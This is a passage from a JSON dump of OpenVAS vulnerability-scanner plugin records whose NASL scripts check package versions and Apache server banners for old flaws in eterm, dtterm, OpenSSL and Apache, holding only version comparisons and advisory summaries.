\"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"eterm\", ver:\"0.9.2-0pre2002042903.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:32", "description": "Check for the Version of dtterm", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for dtterm HPSBUX00309", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0064"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835121", "href": "http://plugins.openvas.org/nasl.php?oid=835121", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for dtterm HPSBUX00309\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote arbitrary command execution\";\ntag_affected = \"dtterm on\n HP-UX B.11.00, B.11.04, B.11.11, B.11.22 running dtterm.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n dtterm. The vulnerability could be exploited to allow remote arbitrary \n command execution.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00910973-1\");\n script_id(835121);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00309\");\n script_cve_id(\"CVE-2003-0064\");\n script_name( \"HP-UX Update for dtterm HPSBUX00309\");\n\n script_summary(\"Check for the Version of dtterm\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29734'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29736'], rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_30167'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29735'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:39:53", "description": "Check for the Version of dtterm", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for dtterm HPSBUX00309", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0064"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835121", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for dtterm HPSBUX00309\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote arbitrary command execution\";\ntag_affected = \"dtterm on\n HP-UX B.11.00, B.11.04, B.11.11, B.11.22 running dtterm.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n dtterm. The vulnerability could be exploited to allow remote arbitrary \n command execution.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00910973-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835121\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00309\");\n script_cve_id(\"CVE-2003-0064\");\n script_name( \"HP-UX Update for dtterm HPSBUX00309\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of dtterm\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29734'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29736'], rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_30167'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"CDE.CDE-DTTERM\", patch_list:['PHSS_29735'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:12", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 253-1.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 253-1 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:53329", "href": "http://plugins.openvas.org/nasl.php?oid=53329", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_253_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 253-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered in OpenSSL, a Secure Socket Layer\n(SSL) implementation. In an upcoming paper, Brice Canvel (EPFL),\nAlain Hiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL,\nIlion) describe and demonstrate a timing-based attack on CBC cipher\nsuites used in SSL and TLS. OpenSSL has been found to vulnerable to\nthis attack.\n\nFor the stable distribution (woody) this problem has been\nfixed in version 0.9.6c-2.woody.2.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.9.6c-0.potato.5. Please note that this updates the\nversion from potato-proposed-updates that superseds the version in\npotato.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 0.9.7a-1.\n\nWe recommend that you upgrade your openssl packages.\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 253-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20253-1\";\n\nif(description)\n{\n script_id(53329);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(6884);\n script_cve_id(\"CVE-2003-0078\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 253-1 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssleay\", ver:\"0.9.6c-0.potato.5\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.6c-0.potato.5\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.6\", ver:\"0.9.6c-0.potato.5\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.6c-0.potato.5\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssleay\", ver:\"0.9.6c-2.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.6c-2.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.6\", ver:\"0.9.6c-2.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.6c-2.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-02-04T16:37:32", "description": "The target is running an Apache web server which allows for the\n injection of arbitrary escape sequences into its error logs.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "Apache Error Log Escape Sequence Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020"], "modified": "2020-02-03T00:00:00", "id": "OPENVAS:136141256231012239", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012239", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Apache Error Log Escape Sequence Injection\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>.\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12239\");\n script_version(\"2020-02-03T13:52:45+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-03 13:52:45 +0000 (Mon, 03 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(9930);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2003-0020\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2004-05-03\");\n script_xref(name:\"CLSA\", value:\"CLSA-2004:839\");\n script_xref(name:\"HPSB\", value:\"HPSBUX01022\");\n script_xref(name:\"RHSA\", value:\"RHSA-2003:139-07\");\n script_xref(name:\"RHSA\", value:\"RHSA-2003:243-07\");\n script_xref(name:\"MDKSA\", value:\"MDKSA-2003:050\");\n script_xref(name:\"OpenPKG-SA\", value:\"OpenPKG-SA-2004.021-apache\");\n script_xref(name:\"SSA\", value:\"SSA:2004-133-01\");\n script_xref(name:\"SuSE-SA\", value:\"SuSE-SA:2004:009\");\n script_xref(name:\"TLSA\", value:\"TLSA-2004-11\");\n script_xref(name:\"TSLSA\", value:\"TSLSA-2004-0017\");\n script_name(\"Apache Error Log Escape Sequence Injection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_mandatory_keys(\"apache/installed\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache version 1.3.31 or 2.0.49 or newer.\");\n\n script_tag(name:\"summary\", value:\"The target is running an Apache web server which allows for the\n injection of arbitrary escape sequences into its error logs.\");\n\n script_tag(name:\"impact\", value:\"An attacker might use this vulnerability in an attempt to exploit\n similar vulnerabilities in terminal emulators.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:apache:http_server\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"1.3.31\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"1.3.31\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.0.0\", test_version2: \"2.0.48\" ) ) {\n report = report_fixed_ver ( installed_version: version, fixed_version: \"2.0.49\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-04-06T11:40:05", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2-example-pages\n apache2\n apache2-devel\n apache2-doc\n libapr0\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5017147 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for Apache2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065283", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065283", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5017147.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2-example-pages\n apache2\n apache2-devel\n apache2-doc\n libapr0\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5017147 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65283\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2003-0020\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.1\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-27T10:49:40", "description": "The target is running an Apache web server which allows for the\ninjection of arbitrary escape sequences into its error logs. An\nattacker might use this vulnerability in an attempt to exploit similar\nvulnerabilities in terminal emulators. \n\n***** OpenVAS has determined the vulnerability exists only by looking at\n***** the Server header returned by the web server running on the target.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "Apache Error Log Escape Sequence Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:12239", "href": "http://plugins.openvas.org/nasl.php?oid=12239", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_log_injection.nasl 6702 2017-07-12 13:49:41Z cfischer $\n# Description: Apache Error Log Escape Sequence Injection\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>.\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The target is running an Apache web server which allows for the\ninjection of arbitrary escape sequences into its error logs. An\nattacker might use this vulnerability in an attempt to exploit similar\nvulnerabilities in terminal emulators. \n\n***** OpenVAS has determined the vulnerability exists only by looking at\n***** the Server header returned by the web server running on the target.\";\n\ntag_solution = \"Upgrade to Apache version 1.3.31 or 2.0.49 or newer.\";\n \nif (description) {\n script_id(12239);\n script_version(\"$Revision: 6702 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 15:49:41 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(9930);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_cve_id(\"CVE-2003-0020\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2004-05-03\");\n script_xref(name:\"CLSA\", value:\"CLSA-2004:839\");\n script_xref(name:\"HPSB\", value:\"HPSBUX01022\");\n script_xref(name:\"RHSA\", value:\"RHSA-2003:139-07\");\n script_xref(name:\"RHSA\", value:\"RHSA-2003:243-07\");\n script_xref(name:\"MDKSA\", value:\"MDKSA-2003:050\");\n script_xref(name:\"OpenPKG-SA\", value:\"OpenPKG-SA-2004.021-apache\");\n script_xref(name:\"SSA\", value:\"SSA:2004-133-01\");\n script_xref(name:\"SuSE-SA\", value:\"SuSE-SA:2004:009\");\n script_xref(name:\"TLSA\", value:\"TLSA-2004-11\");\n script_xref(name:\"TSLSA\", value:\"TSLSA-2004-0017\");\n\n name = \"Apache Error Log Escape Sequence Injection\";\n script_name(name);\n \n summary = \"Checks for Apache Error Log Escape Sequence Injection Vulnerability\";\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n\n family = \"General\";\n script_family(family);\n script_dependencies(\"global_settings.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nhost = get_host_name();\nport = get_http_port(default:80);\nif (debug_level) display(\"debug: checking for Apache Error Log Escape Sequence Injection vulnerability on \", host, \":\", port, \".\\n\");\n\n# Check the web server's banner for the version.\nbanner = get_http_banner(port: port);\nif (!banner) exit(0);\n\nsig = strstr(banner, \"Server:\");\nif (!sig) exit(0);\nif (debug_level) display(\"debug: server sig = >>\", sig, \"<<.\\n\");\n\n# For affected versions of Apache, see:\n# - http://www.apacheweek.com/features/security-13\n# - http://www.apacheweek.com/features/security-20\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.[0-9]|3\\.([0-9][^0-9]|[0-2][0-9]))|2\\.0.([0-9][^0-9]|[0-3][0-9]|4[0-8]))\", string:sig)) {\n security_message(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-26T08:56:09", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2-example-pages\n apache2\n apache2-devel\n apache2-doc\n libapr0\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5017147 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for Apache2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65283", "href": "http://plugins.openvas.org/nasl.php?oid=65283", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5017147.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2-example-pages\n apache2\n apache2-devel\n apache2-doc\n libapr0\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5017147 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n 